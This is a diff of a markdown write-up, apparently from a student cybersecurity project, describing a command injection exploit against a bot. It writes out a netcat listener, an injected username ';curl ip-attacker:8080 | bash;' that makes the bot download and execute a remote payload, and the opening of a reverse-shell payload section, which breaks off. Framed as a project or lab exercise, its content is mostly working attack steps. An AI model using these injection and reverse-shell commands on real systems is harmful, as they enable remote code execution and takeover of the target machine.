PasqualiniGabriele/CybersecurityProect/home.md

 clear
 nc -lvnp 8081
 ```
-In the response.txt file there is the payload that the attacker wants to execute.
+In the response.txt file there is the payload that the attacker wants to execute, wich is sent as a response to http get requests to `process 1`.

+---

 ## Exploit
-The reason I did not inject the entire payload directly through the username is due to the 32-character limit imposed on usernames (including spaces).
+The desired payload can not always be injected directly through the username due to the 32-character limit (including spaces).
-Instead, I set up a remote listener to serve the full payload.
+To work around this limitation, a remote listener was set up to serve the full payload.
-The exploit consists of injecting a command via the username that instructs the bot to fetch and execute code from a remote response.txt file.
+The exploit injects a command in the username that makes the bot fetch and execute code from a remote `response.txt` file.
-The username I used to achieve this was:
+The username used for this injection was:

 ```
 ;curl ip-attacker:8080 | bash;
 ```

+---

 ## Execution

 #### 1)Reverse Shell

-To obtain a `reverse shell`, I wrote the following content in `response.txt`:
+The file `response.txt` was created with the following content to establish a reverse shell:

 ```
 HTTP/1.1 200 OK